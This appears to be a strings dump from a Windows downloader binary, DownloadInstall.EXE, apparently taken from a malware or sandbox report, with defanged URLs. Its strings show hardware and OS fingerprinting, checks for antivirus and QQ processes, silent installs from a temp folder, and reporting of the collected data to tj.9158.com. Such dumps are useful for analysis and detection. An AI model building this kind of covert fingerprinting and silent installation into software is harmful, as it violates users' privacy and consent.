ERROR: Could not SetPriorityClass, LastError: %d
ERROR: Could not SetPriorityClass, LastError: %d
\\.\Scsi%d:
\\.\Scsi%d:
Hard Drive Model Number___________: %s
Hard Drive Model Number___________: %s
Hard Drive Serial Number__________: %s
Hard Drive Serial Number__________: %s
%s (%s:%d)
%s (%s:%d)
D:\Program Files (x86)\Microsoft Visual Studio 9.0\VC\atlmfc\include\afxwin1.inl
D:\Program Files (x86)\Microsoft Visual Studio 9.0\VC\atlmfc\include\afxwin1.inl
softlist=%s&lmarkid=%s
softlist=%s&lmarkid=%s
hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=1&jumpname=&appid=549000912&ptcss=undefined¶m=u1%3Dhttp%253A%252F%252Fqun.qzone.qq.com%252Fgroup&css=&mibao_css=&s_url=http%3A%2F%2Fqun.qzone.qq.com%2Fgroup&low_login=0&style=12&authParamUrl=&needVip=1&ptui_version=10028
hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=1&jumpname=&appid=549000912&ptcss=undefined¶m=u1%3Dhttp%253A%252F%252Fqun.qzone.qq.com%252Fgroup&css=&mibao_css=&s_url=http%3A%2F%2Fqun.qzone.qq.com%2Fgroup&low_login=0&style=12&authParamUrl=&needVip=1&ptui_version=10028
w@C:\Windows\Temp\
w@C:\Windows\Temp\
%sDownLoad
%sDownLoad
_%s%s.exe
_%s%s.exe
_%s.exe
_%s.exe
/S /D=%s
/S /D=%s
%sDownLoad\%s
%sDownLoad\%s
Browser=%s
Browser=%s
&Resolution=%s&OS=%s&KEY=%s&Mac=%s&HardDrive=%s&CPU=%s&Graphics=%s
&Resolution=%s&OS=%s&KEY=%s&Mac=%s&HardDrive=%s&CPU=%s&Graphics=%s
&Safe=%s&QQ=%s&Sougou=%s&Lmarkid=%s&Wmarkid=%s&Mtype=%s&tick=%d&flag=%s&status=%d&qqnumber=%s
&Safe=%s&QQ=%s&Sougou=%s&Lmarkid=%s&Wmarkid=%s&Mtype=%s&tick=%d&flag=%s&status=%d&qqnumber=%s
&downloadtime=%d&setuptime=%d&downloadflag=%d&v=V1.9
&downloadtime=%d&setuptime=%d&downloadflag=%d&v=V1.9
hXXp://tj.9158.com/DownloadInsertinfo.aspx?
hXXp://tj.9158.com/DownloadInsertinfo.aspx?
%ld%s%s
%ld%s%s
%d*%d
%d*%d
%s(%s)
%s(%s)
...%d%c
...%d%c
%Program Files%
%Program Files%
%s Inx:%d Offset:%d Len:%d
%s Inx:%d Offset:%d Len:%d
.tmp.tg
.tmp.tg
****ERR:%d,
****ERR:%d,
nInx:%d, offset:%d, siz:%d
nInx:%d, offset:%d, siz:%d
%d, lRemain
%d, lRemain
ConnectSvr:%s
ConnectSvr:%s
X-X-X-X-X-X
X-X-X-X-X-X
SOFTWARE\%s
SOFTWARE\%s
Microsoft Windows 95
Microsoft Windows 95
Microsoft Windows NT 4.0
Microsoft Windows NT 4.0
Microsoft Windows 98
Microsoft Windows 98
Microsoft Windows Me
Microsoft Windows Me
Microsoft Windows 2000
Microsoft Windows 2000
Microsoft Windows XP
Microsoft Windows XP
Microsoft Windows Server 2003 R2
Microsoft Windows Server 2003 R2
Microsoft Windows Server 2003
Microsoft Windows Server 2003
Microsoft Windows XP Professional x64 Edition
Microsoft Windows XP Professional x64 Edition
Microsoft Windows Server 2008
Microsoft Windows Server 2008
Microsoft Windows Vista
Microsoft Windows Vista
Microsoft Windows Server 2008 R2
Microsoft Windows Server 2008 R2
Microsoft Windows 7
Microsoft Windows 7
unknown OperatingSystem.
unknown OperatingSystem.
Web Edition
Web Edition
\StringFileInfo\xx\ProductVersion
\StringFileInfo\xx\ProductVersion
\StringFileInfo\xx\ProductName
\StringFileInfo\xx\ProductName
HKEY_USERS
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
HKEY_CLASSES_ROOT
SOFTWARE\Microsoft\Windows NT\CurrentVersion
SOFTWARE\Microsoft\Windows NT\CurrentVersion
http\shell\open\command
http\shell\open\command
%s %s
%s %s
\SogouExe\SogouExe.exe
\SogouExe\SogouExe.exe
SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Sogou Input
SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Sogou Input
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sogou Input
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sogou Input
%Program Files% (x86)\SogouInput\SogouExe\SogouExe.exe
%Program Files% (x86)\SogouInput\SogouExe\SogouExe.exe
%Program Files%\SogouInput\SogouExe\SogouExe.exe
%Program Files%\SogouInput\SogouExe\SogouExe.exe
M.exe
M.exe
deepscan\zhudongfangyu.exe
deepscan\zhudongfangyu.exe
360safe.exe
360safe.exe
ZhuDongFangYu.exe
ZhuDongFangYu.exe
QQ.exe
QQ.exe
T58web
T58web
9158web
9158web
User-Agent:Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
User-Agent:Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
HTTP/1.1
HTTP/1.1
%s?log=%s&version=20140121
%s?log=%s&version=20140121
hXXp://tj.9158.com/logtest.aspx
hXXp://tj.9158.com/logtest.aspx
:%d,server:%s, ip:%s,
:%d,server:%s, ip:%s,
:url:%s, server:%s,error msg:%s, errcode:%d
:url:%s, server:%s,error msg:%s, errcode:%d
kernel32.dll
kernel32.dll
CNotSupportedException
CNotSupportedException
hhctrl.ocx
hhctrl.ocx
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
Afx:%p:%x:%p:%p:%p
Afx:%p:%x:%p:%p:%p
Afx:%p:%x
Afx:%p:%x
commctrl_DragListMsg
commctrl_DragListMsg
CCmdTarget
CCmdTarget
CHttpConnection
CHttpConnection
CHttpFile
CHttpFile
hXXp://
hXXp://
WININET.DLL
WININET.DLL
HTTP/1.0
HTTP/1.0
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp
File%d
File%d
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Software\Microsoft\Windows\CurrentVersion\Policies\Network
Software\Microsoft\Windows\CurrentVersion\Policies\Network
Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32
Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32
ntdll.dll
ntdll.dll
%s%s.dll
%s%s.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appcore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appcore.cpp
comctl32.dll
comctl32.dll
comdlg32.dll
comdlg32.dll
shell32.dll
shell32.dll
mfcm90.dll
mfcm90.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filetxt.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filetxt.cpp
user32.dll
user32.dll
ole32.dll
ole32.dll
Please contact the application's support team for more information.
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- CRT not initialized
- floating point support not loaded
- floating point support not loaded
operator
operator
GetProcessWindowStation
GetProcessWindowStation
USER32.DLL
USER32.DLL
F%D,3
F%D,3
OLEACC.dll
OLEACC.dll
SHLWAPI.dll
SHLWAPI.dll
WSOCK32.dll
WSOCK32.dll
GetProcessHeap
GetProcessHeap
GetCPInfo
GetCPInfo
GetConsoleOutputCP
GetConsoleOutputCP
KERNEL32.dll
KERNEL32.dll
GetKeyState
GetKeyState
UnhookWindowsHookEx
UnhookWindowsHookEx
SetWindowsHookExA
SetWindowsHookExA
CreateDialogIndirectParamA
CreateDialogIndirectParamA
USER32.dll
USER32.dll
GetViewportExtEx
GetViewportExtEx
SetViewportOrgEx
SetViewportOrgEx
OffsetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
SetViewportExtEx
ScaleViewportExtEx
ScaleViewportExtEx
GDI32.dll
GDI32.dll
COMDLG32.dll
COMDLG32.dll
WINSPOOL.DRV
WINSPOOL.DRV
RegCloseKey
RegCloseKey
RegOpenKeyA
RegOpenKeyA
RegCreateKeyExA
RegCreateKeyExA
RegOpenKeyExA
RegOpenKeyExA
RegEnumKeyExA
RegEnumKeyExA
RegDeleteKeyA
RegDeleteKeyA
RegEnumKeyA
RegEnumKeyA
ADVAPI32.dll
ADVAPI32.dll
ShellExecuteA
ShellExecuteA
ShellExecuteExA
ShellExecuteExA
SHELL32.dll
SHELL32.dll
COMCTL32.dll
COMCTL32.dll
oledlg.dll
oledlg.dll
OLEAUT32.dll
OLEAUT32.dll
GdiplusShutdown
GdiplusShutdown
gdiplus.dll
gdiplus.dll
NETAPI32.dll
NETAPI32.dll
VERSION.dll
VERSION.dll
UrlUnescapeA
UrlUnescapeA
InternetCrackUrlA
InternetCrackUrlA
InternetCanonicalizeUrlA
InternetCanonicalizeUrlA
HttpQueryInfoA
HttpQueryInfoA
HttpSendRequestA
HttpSendRequestA
InternetOpenUrlA
InternetOpenUrlA
HttpOpenRequestA
HttpOpenRequestA
WININET.dll
WININET.dll
.?AVCCmdTarget@@
.?AVCCmdTarget@@
.PAVCFileException@@
.PAVCFileException@@
.?AV?$CList@PAVCFTPTask@@AAPAV1@@@
.?AV?$CList@PAVCFTPTask@@AAPAV1@@@
.PAVCException@@
.PAVCException@@
.?AVCFTPTask@@
.?AVCFTPTask@@
.?AVCHttpService@@
.?AVCHttpService@@
.?AVCMD5Checksum@@
.?AVCMD5Checksum@@
.PAVCObject@@
.PAVCObject@@
.PAVCOleException@@
.PAVCOleException@@
.PAVCMemoryException@@
.PAVCMemoryException@@
.PAVCSimpleException@@
.PAVCSimpleException@@
.PAVCNotSupportedException@@
.PAVCNotSupportedException@@
.PAVCInvalidArgException@@
.PAVCInvalidArgException@@
.?AVCNotSupportedException@@
.?AVCNotSupportedException@@
.?AVCTestCmdUI@@
.?AVCTestCmdUI@@
.?AVCCmdUI@@
.?AVCCmdUI@@
.PAVCUserException@@
.PAVCUserException@@
.PAVCResourceException@@
.PAVCResourceException@@
.PAVCInternetException@@
.PAVCInternetException@@
.?AVCHttpConnection@@
.?AVCHttpConnection@@
.?AVCHttpFile@@
.?AVCHttpFile@@
.PAVCArchiveException@@
.PAVCArchiveException@@
.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@
.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@
.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@
.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@
.PAVCOleDispatchException@@
.PAVCOleDispatchException@@
zcÃ
zcÃ
00000000000000000001
00000000000000000001
c:\MM-liao8327.exe
c:\MM-liao8327.exe
`R.qB
`R.qB
h/y%DlRZ
h/y%DlRZ
J!Ç
J!Ç
yR^y.%U3
yR^y.%U3
/.Ro}!
/.Ro}!
p)%sQ
p)%sQ
CZ%SY
CZ%SY
.vyOx
.vyOx
.Pm[
.Pm[
42a%u
42a%u
O%fWU
O%fWU
%cPqt
%cPqt
F2/%c
F2/%c
C7%SQ5
C7%SQ5
XU%fR
XU%fR
QN.Ui
QN.Ui
IßD
IßD
(Bô|
(Bô|
.Qsty
.Qsty
.bYV`
.bYV`
40%sS
40%sS
%%co\s
%%co\s
P.WGD
P.WGD
2Um
2Um
%U2b&0
%U2b&0
%se7sQ
%se7sQ
[Q.QN]
[Q.QN]
4g%x=XL$5
4g%x=XL$5
.Bsw&wf
.Bsw&wf
uÿQ
uÿQ
R#.oR
R#.oR
45.sSC
45.sSC
OBW2%S2%S2
OBW2%S2%S2
u\%Cr@
u\%Cr@
.Pd4{
.Pd4{
[K.On
[K.On
W.eQYT
W.eQYT
gB7%U
gB7%U
9~ui.QBv@
9~ui.QBv@
J.pEu
J.pEu
\.MdB
\.MdB
accKeyboardShortcut
accKeyboardShortcut
mscoree.dll
mscoree.dll
ekernel32.dll
ekernel32.dll
KERNEL32.DLL
KERNEL32.DLL
DownloadInstall.Document
DownloadInstall.Document
(*.*)
(*.*)
Output.prn$
Output.prn$
(*.prn)|*.prn|
(*.prn)|*.prn|
(*.*)|*.*||
(*.*)|*.*||
1, 0, 0, 1
1, 0, 0, 1
DownloadInstall.EXE
DownloadInstall.EXE